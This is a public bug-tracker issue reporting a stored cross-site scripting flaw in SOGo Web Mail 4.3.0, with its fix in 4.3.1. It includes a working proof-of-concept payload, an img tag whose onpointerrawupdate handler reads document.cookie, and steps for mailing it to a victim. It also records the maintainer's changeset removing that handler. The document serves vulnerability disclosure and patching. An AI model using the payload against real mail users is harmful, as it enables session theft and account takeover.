View Issue Details

IDProjectCategoryView StatusLast Update
0004979SOGoWeb Mailpublic2020-03-06 17:17
Reportertzrj Assigned Tofrancis  
PriorityhighSeveritymajorReproducibilityN/A
Status resolvedResolutionfixed 
Product Version4.3.0 
Fixed in Version4.3.1 
Summary0004979: Stored XSS in Web Mail
Description

Stored XSS at Web Mail (Works on Chrome Latest)
Payload:
<img src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNTgwIiBoZWlnaHQ9IjQwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KIDxnPgogIDxyZWN0IGZpbGw9IiNmZmYiIGlkPSJjYW52YXNfYmFja2dyb3VuZCIgaGVpZ2h0PSI0MDIiIHdpZHRoPSI1ODIiIHk9Ii0xIiB4PSItMSIvPgogIDxnIGRpc3BsYXk9Im5vbmUiIG92ZXJmbG93PSJ2aXNpYmxlIiB5PSIwIiB4PSIwIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBpZD0iY2FudmFzR3JpZCI+CiAgIDxyZWN0IGZpbGw9InVybCgjZ3JpZHBhdHRlcm4pIiBzdHJva2Utd2lkdGg9IjAiIHk9IjAiIHg9IjAiIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiLz4KICA8L2c+CiA8L2c+CiA8Zz4KIDwvZz4KPC9zdmc+" onpointerrawupdate="alert(document.cookie);" />

Steps To Reproduce

Send mail to mailbox using SOGo Web Mail with the payload
When the victim passes the picture with the mouse, an alert will fire with cookies

TagsNo tags attached.

Activities

There are no notes attached to this issue.

Related Changesets

sogo: master d1dbceb4

2020-03-06 12:14

francis


Details Diff
fix(mail): remove onpointerrawupdate event handler from HTML messages

Fixes 0004979
Affected Issues
0004979
mod - UI/MailPartViewers/UIxMailPartHTMLViewer.m Diff File
mod - UI/Templates/MailerUI/UIxMailEditor.wox Diff File
mod - UI/WebServerResources/js/Common/sgAutogrow.directive.js Diff File

Issue History

Date Modified Username Field Change
2020-03-06 06:12 tzrj New Issue
2020-03-06 17:16 francis Changeset attached => sogo master d1dbceb4
2020-03-06 17:16 francis Assigned To => francis
2020-03-06 17:16 francis Resolution open => fixed
2020-03-06 17:17 francis Status new => resolved
2020-03-06 17:17 francis Fixed in Version => 4.3.1